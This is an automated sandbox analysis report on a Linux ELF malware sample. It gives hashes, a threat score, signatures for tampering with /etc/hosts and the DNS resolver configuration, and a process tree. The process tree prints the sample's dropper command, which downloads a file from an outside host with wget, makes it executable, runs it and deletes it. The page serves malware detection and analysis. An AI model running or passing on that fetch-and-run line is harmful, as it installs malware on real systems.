b7d0d17ea7871db4d8faf0ddddf30ce24ca142574b48362f7f82ca349ec9e2f4

Analysis

max time kernel
0s
max time network
103s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
03-09-2022 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e4921180eafa91a234b1034c772ba887.elf
Size

46KB
MD5

e4921180eafa91a234b1034c772ba887
SHA1

8c66fd601cac2611b22bd69a7862b25e8b9a2e36
SHA256

b7d0d17ea7871db4d8faf0ddddf30ce24ca142574b48362f7f82ca349ec9e2f4
SHA512

3004c1632e15d54a72dc4665351699ae65494abf15f000982d3dcedff77ffcf755b6dd18316694ad8d688166d120051f0a59c9f2e8965eaab8c880bf54ca8327
SSDEEP

768:eRxm/aDxX7Wq3X5RJrdNW3Jq/BgxSh//Id8Np/JIB+Mq0uwcS:0US9X7PnDA3JquK//IWp/JBDScS

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

/tmp/e4921180eafa91a234b1034c772ba887.elf
/tmp/e4921180eafa91a234b1034c772ba887.elf
1⤵
PID:592

/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../cipher -O .....;chmod 777 .....;./.....;rm -rf ..... "
1⤵
PID:595
- /usr/bin/wget
  wget -q http://gay.energy/.../cipher -O .....
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:596
- /bin/chmod
  chmod 777 .....
  2⤵
  PID:597
- ./.....
  ./.....
  2⤵
  PID:598
- /bin/sh
  /bin/sh ./.....
  2⤵
  PID:598
- /bin/rm
  rm -rf .....
  2⤵
  PID:600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads